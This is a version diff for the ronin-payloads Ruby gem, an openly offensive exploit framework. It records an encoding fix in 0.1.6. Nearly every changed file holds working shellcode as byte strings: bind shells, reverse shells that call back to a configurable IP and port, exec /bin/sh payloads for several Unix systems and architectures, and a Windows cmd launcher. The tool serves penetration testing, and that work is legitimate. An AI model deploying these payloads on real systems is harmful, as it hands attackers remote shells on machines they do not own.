ronin-payloads 0.1.5 → 0.1.6

Sign up to get free protection for your applications and to get access to all the features.
Files changed (30) hide show
  1. checksums.yaml +4 -4
  2. data/.rubocop.yml +3 -0
  3. data/ChangeLog.md +7 -0
  4. data/README.md +1 -0
  5. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/bind_shell.rb +2 -1
  6. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/exec_shell.rb +2 -1
  7. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/reverse_shell.rb +2 -1
  8. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86_64/exec_shell.rb +2 -1
  9. data/lib/ronin/payloads/builtin/shellcode/linux/arm/bind_shell.rb +2 -1
  10. data/lib/ronin/payloads/builtin/shellcode/linux/arm/exec_shell.rb +2 -1
  11. data/lib/ronin/payloads/builtin/shellcode/linux/arm/reverse_shell.rb +2 -1
  12. data/lib/ronin/payloads/builtin/shellcode/linux/mips/bind_shell.rb +2 -1
  13. data/lib/ronin/payloads/builtin/shellcode/linux/mips/exec_shell.rb +13 -12
  14. data/lib/ronin/payloads/builtin/shellcode/linux/mips/reverse_shell.rb +2 -1
  15. data/lib/ronin/payloads/builtin/shellcode/linux/ppc/exec_shell.rb +15 -14
  16. data/lib/ronin/payloads/builtin/shellcode/linux/ppc/reverse_shell.rb +2 -1
  17. data/lib/ronin/payloads/builtin/shellcode/linux/x86/bind_shell.rb +2 -1
  18. data/lib/ronin/payloads/builtin/shellcode/linux/x86/exec_shell.rb +2 -1
  19. data/lib/ronin/payloads/builtin/shellcode/linux/x86/reverse_shell.rb +2 -1
  20. data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/bind_shell.rb +2 -1
  21. data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/exec_shell.rb +11 -10
  22. data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/reverse_shell.rb +2 -1
  23. data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/exec_shell.rb +2 -1
  24. data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/reverse_shell.rb +2 -1
  25. data/lib/ronin/payloads/builtin/shellcode/netbsd/x86/exec_shell.rb +2 -1
  26. data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/bind_shell.rb +2 -1
  27. data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/exec_shell.rb +13 -12
  28. data/lib/ronin/payloads/builtin/shellcode/windows/x86_64/cmd.rb +21 -20
  29. data/lib/ronin/payloads/version.rb +1 -1
  30. metadata +2 -2
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: 23ed6234ba68bb63d9e7e909987b1b4c3b5f8f75048cb9cef20c61d2a5769bcc
4
- data.tar.gz: de32a35122ac1e6452b3d1a0148fcb0d4089a9fefa951084cc51cd36bd27c98c
3
+ metadata.gz: 97fb8be02023f3bdaf5ef16711bf1192a574ee10b00a46912c964b01e8577012
4
+ data.tar.gz: a3eb94423e154cd03df538b3883f58de6c166dc7ba7a8f6da077f192f9c66b44
5
5
  SHA512:
6
- metadata.gz: b5dfda82e5c0fcda3da9d48093921b5bcc6935460f9a6bc434b0891a60bfb08995526a3b39f540d6515faddcfc6d882d7f3f27cb64107300c1bbc0e575f43c3b
7
- data.tar.gz: 5457d1110e9cd8b544e95cdb890a0d135e6e01b3a4f6b7e3fedacdd84bf9cb12005ee695a6b5b6061d824f3f631c31d75b4a1fd44aabe2f8a343b1cd6fab9c93
6
+ metadata.gz: c4d865c10c583da8a38aea5bb79f39f1165d15dd54e09594a2a557a4880058d7c6bd6f5411f382f9a49386cd2fc36ada45868a7001135ebc742613c9d732a359
7
+ data.tar.gz: 795417f0c54ae31283be366941b1f703f67fc3d7cfae9cd13f634b89323b2119e0389cc433638514296327a93f4efdfdad5d63c6458eb46fdb3a5be8f4a192a6
data/.rubocop.yml CHANGED
@@ -40,3 +40,6 @@ Style/RedundantLineContinuation:
40
40
  Layout/LineContinuationSpacing:
41
41
  Exclude:
42
42
  - 'lib/ronin/payloads/builtin/shellcode/**/*.rb'
43
+ Style/StringConcatenation:
44
+ Exclude:
45
+ - 'lib/ronin/payloads/builtin/shellcode/**/*.rb'
data/ChangeLog.md CHANGED
@@ -1,3 +1,10 @@
1
+ ### 0.1.6 / 2024-07-01
2
+
3
+ #### Payloads
4
+
5
+ * Fixed `incompatible character encodings: UTF-8 and ASCII-8BIT` exceptions when
6
+ building shellcode payloads with certain IP addresses or port numbers.
7
+
1
8
  ### 0.1.5 / 2024-06-19
2
9
 
3
10
  * Fixed order of arguments passed to `TCPServer.new` in
data/README.md CHANGED
@@ -213,6 +213,7 @@ $ git push
213
213
  Define a `/bin/sh` shellcode payload:
214
214
 
215
215
  ```ruby
216
+ # encoding: ASCII-8BIT
216
217
  require 'ronin/payloads/shellcode_payload'
217
218
 
218
219
  module Ronin
data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/bind_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -58,7 +59,7 @@ module Ronin
58
59
  "\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03\xbb\xff\xff" \
59
60
  "\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01" \
60
61
  "\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\x97\xff" \
61
- "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23".b
62
+ "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23"
62
63
  end
63
64
 
64
65
  end
data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/exec_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -53,7 +54,7 @@ module Ronin
53
54
  def build
54
55
  @payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68" \
55
56
  "\x68\x2f\x62\x69\x6e\x89\xe3\x50" \
56
- "\x54\x53\xb0\x3b\x50\xcd\x80".b
57
+ "\x54\x53\xb0\x3b\x50\xcd\x80"
57
58
  end
58
59
 
59
60
  end
data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/reverse_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -56,7 +57,7 @@ module Ronin
56
57
  "\xe1\x6a\x10\x51\x52\x31\xc0\xb0\x62\x50\xcd\x80\x31\xc9" \
57
58
  "\x51\x52\x31\xc0\xb0\x5a\x50\xcd\x80\xfe\xc1\x80\xf9\x03" \
58
59
  "\x75\xf0\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" \
59
- "\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80".b
60
+ "\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"
60
61
  end
61
62
 
62
63
  end
data/lib/ronin/payloads/builtin/shellcode/freebsd/x86_64/exec_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -53,7 +54,7 @@ module Ronin
53
54
  def build
54
55
  @payload = "\x48\x31\xc9\x48\xf7\xe1\x04\x3b\x48\xbb" \
55
56
  "\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x53" \
56
- "\x54\x5f\x52\x57\x54\x5e\x0f\x05".b
57
+ "\x54\x5f\x52\x57\x54\x5e\x0f\x05"
57
58
  end
58
59
 
59
60
  end
data/lib/ronin/payloads/builtin/shellcode/linux/arm/bind_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -119,7 +120,7 @@ module Ronin
119
120
  "\x08\x00\x8d\xe2" \
120
121
  "\x00\x10\x8d\xe2" \
121
122
  "\x04\x20\x8d\xe2" \
122
- "\x0b\x00\x90\xef".b
123
+ "\x0b\x00\x90\xef"
123
124
  end
124
125
 
125
126
  end
data/lib/ronin/payloads/builtin/shellcode/linux/arm/exec_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -60,7 +61,7 @@ module Ronin
60
61
  "\xc2\x51\x03\x37" \
61
62
  "\x01\xdf\x2f\x62" \
62
63
  "\x69\x6e\x2f\x2f" \
63
- "\x73\x68".b
64
+ "\x73\x68"
64
65
  end
65
66
 
66
67
  end
data/lib/ronin/payloads/builtin/shellcode/linux/arm/reverse_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -72,7 +73,7 @@ module Ronin
72
73
  "#{packed_port}" \
73
74
  "#{packed_ipv4}" \
74
75
  \
75
- "/bin/sh\0".b
76
+ "/bin/sh\0"
76
77
  end
77
78
 
78
79
  end
data/lib/ronin/payloads/builtin/shellcode/linux/mips/bind_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -118,7 +119,7 @@ module Ronin
118
119
  "\xf0\xff\xa5\x23" \
119
120
  "\xab\x0f\x02\x24" \
120
121
  "\x0c\x01\x01\x01" \
121
- "/bin/sh".b
122
+ "/bin/sh"
122
123
  end
123
124
 
124
125
  end
data/lib/ronin/payloads/builtin/shellcode/linux/mips/exec_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -51,18 +52,18 @@ module Ronin
51
52
  # Builds the shellcode.
52
53
  #
53
54
  def build
54
- @payload = "\x28\x06\xff\xff".b + # slti a2,zero,-1
55
- "\x3c\x0f\x2f\x2f".b + # lui t7,0x2f2f
56
- "\x35\xef\x62\x69".b + # ori t7,t7,0x6269
57
- "\xaf\xaf\xff\xf4".b + # sw t7,-12(sp)
58
- "\x3c\x0e\x6e\x2f".b + # lui t6,0x6e2f
59
- "\x35\xce\x73\x68".b + # ori t6,t6,0x7368
60
- "\xaf\xae\xff\xf8".b + # sw t6,-8(sp)
61
- "\xaf\xa0\xff\xfc".b + # sw zero,-4(sp)
62
- "\x27\xa4\xff\xf4".b + # addiu a0,sp,-12
63
- "\x28\x05\xff\xff".b + # slti a1,zero,-1
64
- "\x24\x02\x0f\xab".b + # li v0,4011
65
- "\x01\x01\x01\x0c".b # syscall 0x40404
55
+ @payload = "\x28\x06\xff\xff" + # slti a2,zero,-1
56
+ "\x3c\x0f\x2f\x2f" + # lui t7,0x2f2f
57
+ "\x35\xef\x62\x69" + # ori t7,t7,0x6269
58
+ "\xaf\xaf\xff\xf4" + # sw t7,-12(sp)
59
+ "\x3c\x0e\x6e\x2f" + # lui t6,0x6e2f
60
+ "\x35\xce\x73\x68" + # ori t6,t6,0x7368
61
+ "\xaf\xae\xff\xf8" + # sw t6,-8(sp)
62
+ "\xaf\xa0\xff\xfc" + # sw zero,-4(sp)
63
+ "\x27\xa4\xff\xf4" + # addiu a0,sp,-12
64
+ "\x28\x05\xff\xff" + # slti a1,zero,-1
65
+ "\x24\x02\x0f\xab" + # li v0,4011
66
+ "\x01\x01\x01\x0c" # syscall 0x40404
66
67
  end
67
68
 
68
69
  end
data/lib/ronin/payloads/builtin/shellcode/linux/mips/reverse_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -100,7 +101,7 @@ module Ronin
100
101
  "\x27\xa4\xff\xf4" \
101
102
  "\x28\x05\xff\xff" \
102
103
  "\x24\x02\x0f\xab" \
103
- "\x01\x01\x01\x0c".b
104
+ "\x01\x01\x01\x0c"
104
105
  end
105
106
 
106
107
  end
data/lib/ronin/payloads/builtin/shellcode/linux/ppc/exec_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -51,20 +52,20 @@ module Ronin
51
52
  # Builds the shellcode.
52
53
  #
53
54
  def build
54
- @payload = "\x7c\x3f\x0b\x78".b + # mr r31,r1
55
- "\x7c\xa5\x2a\x79".b + # xor. r5,r5,r5
56
- "\x42\x40\xff\xf9".b + # bdzl+ 10000454< main>
57
- "\x7f\x08\x02\xa6".b + # mflr r24
58
- "\x3b\x18\x01\x34".b + # addi r24,r24,308
59
- "\x98\xb8\xfe\xfb".b + # stb r5,-261(r24)
60
- "\x38\x78\xfe\xf4".b + # addi r3,r24,-268
61
- "\x90\x61\xff\xf8".b + # stw r3,-8(r1)
62
- "\x38\x81\xff\xf8".b + # addi r4,r1,-8
63
- "\x90\xa1\xff\xfc".b + # stw r5,-4(r1)
64
- "\x3b\xc0\x01\x60".b + # li r30,352
65
- "\x7f\xc0\x2e\x70".b + # srawi r0,r30,5
66
- "\x44\xde\xad\xf2".b + # .long 0x44deadf2
67
- "/bin/shZ".b # the last byte becomes NULL
55
+ @payload = "\x7c\x3f\x0b\x78" + # mr r31,r1
56
+ "\x7c\xa5\x2a\x79" + # xor. r5,r5,r5
57
+ "\x42\x40\xff\xf9" + # bdzl+ 10000454< main>
58
+ "\x7f\x08\x02\xa6" + # mflr r24
59
+ "\x3b\x18\x01\x34" + # addi r24,r24,308
60
+ "\x98\xb8\xfe\xfb" + # stb r5,-261(r24)
61
+ "\x38\x78\xfe\xf4" + # addi r3,r24,-268
62
+ "\x90\x61\xff\xf8" + # stw r3,-8(r1)
63
+ "\x38\x81\xff\xf8" + # addi r4,r1,-8
64
+ "\x90\xa1\xff\xfc" + # stw r5,-4(r1)
65
+ "\x3b\xc0\x01\x60" + # li r30,352
66
+ "\x7f\xc0\x2e\x70" + # srawi r0,r30,5
67
+ "\x44\xde\xad\xf2" + # .long 0x44deadf2
68
+ "/bin/shZ" # the last byte becomes NULL
68
69
  end
69
70
 
70
71
  end
data/lib/ronin/payloads/builtin/shellcode/linux/ppc/reverse_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -125,7 +126,7 @@ module Ronin
125
126
  "\x3b\xc0\x01\x60" \
126
127
  "\x7f\xc0\x2e\x70" \
127
128
  "\x44\xde\xad\xf2" \
128
- "/bin/shZ".b
129
+ "/bin/shZ"
129
130
  end
130
131
 
131
132
  end
data/lib/ronin/payloads/builtin/shellcode/linux/x86/bind_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -98,7 +99,7 @@ module Ronin
98
99
  "\x68\x2f\x62\x69\x6e" \
99
100
  "\x89\xe3" \
100
101
  "\xb0\x0b" \
101
- "\xcd\x80".b
102
+ "\xcd\x80"
102
103
  end
103
104
 
104
105
  end
data/lib/ronin/payloads/builtin/shellcode/linux/x86/exec_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -54,7 +55,7 @@ module Ronin
54
55
  def build
55
56
  @payload = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f" \
56
57
  "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd" \
57
- "\x80".b
58
+ "\x80"
58
59
  end
59
60
 
60
61
  end
data/lib/ronin/payloads/builtin/shellcode/linux/x86/reverse_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -62,7 +63,7 @@ module Ronin
62
63
  "\xc0\x52\x68\x6e\x2f\x73\x68\x68" \
63
64
  "\x2f\x2f\x62\x69\x89\xe3\x52\x53" \
64
65
  "\x89\xe1\x52\x89\xe2\xb0\x0b\xcd" \
65
- "\x80".b
66
+ "\x80"
66
67
  end
67
68
 
68
69
  end
data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/bind_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -59,7 +60,7 @@ module Ronin
59
60
  "\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21" \
60
61
  "\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68" \
61
62
  "\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89" \
62
- "\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05".b
63
+ "\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05"
63
64
  end
64
65
 
65
66
  end
data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/exec_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -51,16 +52,16 @@ module Ronin
51
52
  # Builds the shellcode.
52
53
  #
53
54
  def build
54
- @payload = "\x48\x31\xd2".b + # xor %rdx, %rdx
55
- "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68".b + # mov $0x68732f6e69622f2f, %rbx
56
- "\x48\xc1\xeb\x08".b + # shr $0x8, %rbx
57
- "\x53".b + # push %rbx
58
- "\x48\x89\xe7".b + # mov %rsp, %rdi
59
- "\x50".b + # push %rax
60
- "\x57".b + # push %rdi
61
- "\x48\x89\xe6".b + # mov %rsp, %rsi
62
- "\xb0\x3b".b + # mov $0x3b, %al
63
- "\x0f\x05".b # syscall
55
+ @payload = "\x48\x31\xd2" + # xor %rdx, %rdx
56
+ "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" + # mov $0x68732f6e69622f2f, %rbx
57
+ "\x48\xc1\xeb\x08" + # shr $0x8, %rbx
58
+ "\x53" + # push %rbx
59
+ "\x48\x89\xe7" + # mov %rsp, %rdi
60
+ "\x50" + # push %rax
61
+ "\x57" + # push %rdi
62
+ "\x48\x89\xe6" + # mov %rsp, %rsi
63
+ "\xb0\x3b" + # mov $0x3b, %al
64
+ "\x0f\x05" # syscall
64
65
  end
65
66
 
66
67
  end
data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/reverse_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -58,7 +59,7 @@ module Ronin
58
59
  "\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" \
59
60
  "\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" \
60
61
  "\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" \
61
- "\x5f\x6a\x3b\x58\x0f\x05".b
62
+ "\x5f\x6a\x3b\x58\x0f\x05"
62
63
  end
63
64
 
64
65
  end
data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/exec_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -55,7 +56,7 @@ module Ronin
55
56
  @payload = "\x48\x31\xd2\x48\xc7\xc0\xf6\xff\xff\x01" \
56
57
  "\x48\x83\xc0\x45\x5f\x52\x57\x48\x89\xe6" \
57
58
  "\x0f\x05\xe8\xe5\xff\xff\xff\x2f\x62\x69" \
58
- "\x6e\x2f\x2f\x73\x68".b
59
+ "\x6e\x2f\x2f\x73\x68"
59
60
  end
60
61
 
61
62
  end
data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/reverse_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -60,7 +61,7 @@ module Ronin
60
61
  "\xe8\x08\x48\x31\xf6\x4c\x89\xc0\x4c\x89\xe7\x0f\x05\x48\x83" \
61
62
  "\xfe\x02\x48\xff\xc6\x76\xef\x49\x83\xe8\x1f\x4c\x89\xc0\x48" \
62
63
  "\x31\xd2\x49\xbd\xff\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xed" \
63
- "\x08\x41\x55\x48\x89\xe7\x48\x31\xf6\x0f\x05".b
64
+ "\x08\x41\x55\x48\x89\xe7\x48\x31\xf6\x0f\x05"
64
65
  end
65
66
 
66
67
  end
data/lib/ronin/payloads/builtin/shellcode/netbsd/x86/exec_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -74,7 +75,7 @@ module Ronin
74
75
  "\x01\x01\x01\x01" \
75
76
  "\x02\x02\x02\x02" \
76
77
  "\x03\x03\x03\x03" \
77
- "\x9a\x04\x04\x04\x04\x07\x04".b
78
+ "\x9a\x04\x04\x04\x04\x07\x04"
78
79
  end
79
80
 
80
81
  end
data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/bind_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -60,7 +61,7 @@ module Ronin
60
61
  "\xef\xeb\x23\x5b\x89\x1f\x31\xc9\x88\x4b\x07\x89\x4f\x04\x51\x8d" \
61
62
  "\x07\x50\x8b\x07\x50\x50\x31\xc0\xb0\x3b\xcd\x80\x31\xc9\x51\x51" \
62
63
  "\x31\xc0\xb0\x01\xcd\x80\xe8\xd8\xff\xff\xff\x2f\x62\x69\x6e\x2f" \
63
- "\x73\x68\x41\x90".b
64
+ "\x73\x68\x41\x90"
64
65
  end
65
66
 
66
67
  end
data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/exec_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -52,18 +53,18 @@ module Ronin
52
53
  # Builds the shellcode.
53
54
  #
54
55
  def build
55
- @payload = "\x99".b + # cltd
56
- "\x52".b + # push %edx
57
- "\x68\x6e\x2f\x73\x68".b + # push $0x68732f6e
58
- "\x68\x2f\x2f\x62\x69".b + # push $0x69622f2f
59
- "\x89\xe3".b + # mov %esp,%ebx
60
- "\x52".b + # push %edx
61
- "\x54".b + # push %esp
62
- "\x53".b + # push %ebx
63
- "\x53".b + # push %ebx
64
- "\x6a\x3b".b + # push $0x3b
65
- "\x58".b + # pop %eax
66
- "\xcd\x80".b # int $0x80
56
+ @payload = "\x99" + # cltd
57
+ "\x52" + # push %edx
58
+ "\x68\x6e\x2f\x73\x68" + # push $0x68732f6e
59
+ "\x68\x2f\x2f\x62\x69" + # push $0x69622f2f
60
+ "\x89\xe3" + # mov %esp,%ebx
61
+ "\x52" + # push %edx
62
+ "\x54" + # push %esp
63
+ "\x53" + # push %ebx
64
+ "\x53" + # push %ebx
65
+ "\x6a\x3b" + # push $0x3b
66
+ "\x58" + # pop %eax
67
+ "\xcd\x80" # int $0x80
67
68
  end
68
69
 
69
70
  end
data/lib/ronin/payloads/builtin/shellcode/windows/x86_64/cmd.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -52,26 +53,26 @@ module Ronin
52
53
  # Builds the shellcode.
53
54
  #
54
55
  def build
55
- @payload = "\x31\xC9".b + # xor ecx,ecx
56
- "\x64\x8B\x71\x30".b + # mov esi,[fs:ecx+0x30]
57
- "\x8B\x76\x0C".b + # mov esi,[esi+0xc]
58
- "\x8B\x76\x1C".b + # mov esi,[esi+0x1c]
59
- "\x8B\x36".b + # mov esi,[esi]
60
- "\x8B\x06".b + # mov eax,[esi]
61
- "\x8B\x68\x08".b + # mov ebp,[eax+0x8]
62
- "\xEB\x20".b + # jmp short 0x35
63
- "\x5B".b + # pop ebx
64
- "\x53".b + # push ebx
65
- "\x55".b + # push ebp
66
- "\x5B".b + # pop ebx
67
- "\x81\xEB\x11\x11\x11\x11".b + # sub ebx,0x11111111
68
- "\x81\xC3\xDA\x3F\x1A\x11".b + # add ebx,0x111a3fda (for seven X86 add ebx,0x1119f7a6)
69
- "\xFF\xD3".b + # call ebx
70
- "\x81\xC3\x11\x11\x11\x11".b + # add ebx,0x11111111
71
- "\x81\xEB\x8C\xCC\x18\x11".b + # sub ebx,0x1118cc8c (for seven X86 sub ebx,0x1114ccd7)
72
- "\xFF\xD3".b + # call ebx
73
- "\xE8\xDB\xFF\xFF\xFF".b + # call dword 0x15
74
- "\x63\x6d\x64".b # db "cmd"
56
+ @payload = "\x31\xC9" + # xor ecx,ecx
57
+ "\x64\x8B\x71\x30" + # mov esi,[fs:ecx+0x30]
58
+ "\x8B\x76\x0C" + # mov esi,[esi+0xc]
59
+ "\x8B\x76\x1C" + # mov esi,[esi+0x1c]
60
+ "\x8B\x36" + # mov esi,[esi]
61
+ "\x8B\x06" + # mov eax,[esi]
62
+ "\x8B\x68\x08" + # mov ebp,[eax+0x8]
63
+ "\xEB\x20" + # jmp short 0x35
64
+ "\x5B" + # pop ebx
65
+ "\x53" + # push ebx
66
+ "\x55" + # push ebp
67
+ "\x5B" + # pop ebx
68
+ "\x81\xEB\x11\x11\x11\x11" + # sub ebx,0x11111111
69
+ "\x81\xC3\xDA\x3F\x1A\x11" + # add ebx,0x111a3fda (for seven X86 add ebx,0x1119f7a6)
70
+ "\xFF\xD3" + # call ebx
71
+ "\x81\xC3\x11\x11\x11\x11" + # add ebx,0x11111111
72
+ "\x81\xEB\x8C\xCC\x18\x11" + # sub ebx,0x1118cc8c (for seven X86 sub ebx,0x1114ccd7)
73
+ "\xFF\xD3" + # call ebx
74
+ "\xE8\xDB\xFF\xFF\xFF" + # call dword 0x15
75
+ "\x63\x6d\x64" # db "cmd"
75
76
  end
76
77
 
77
78
  end
data/lib/ronin/payloads/version.rb CHANGED
@@ -22,6 +22,6 @@
22
22
  module Ronin
23
23
  module Payloads
24
24
  # ronin-payloads version
25
- VERSION = '0.1.5'
25
+ VERSION = '0.1.6'
26
26
  end
27
27
  end
metadata CHANGED
@@ -1,14 +1,14 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: ronin-payloads
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.5
4
+ version: 0.1.6
5
5
  platform: ruby
6
6
  authors:
7
7
  - Postmodern
8
8
  autorequire:
9
9
  bindir: bin
10
10
  cert_chain: []
11
- date: 2024-06-20 00:00:00.000000000 Z
11
+ date: 2024-07-03 00:00:00.000000000 Z
12
12
  dependencies:
13
13
  - !ruby/object:Gem::Dependency
14
14
  name: ronin-support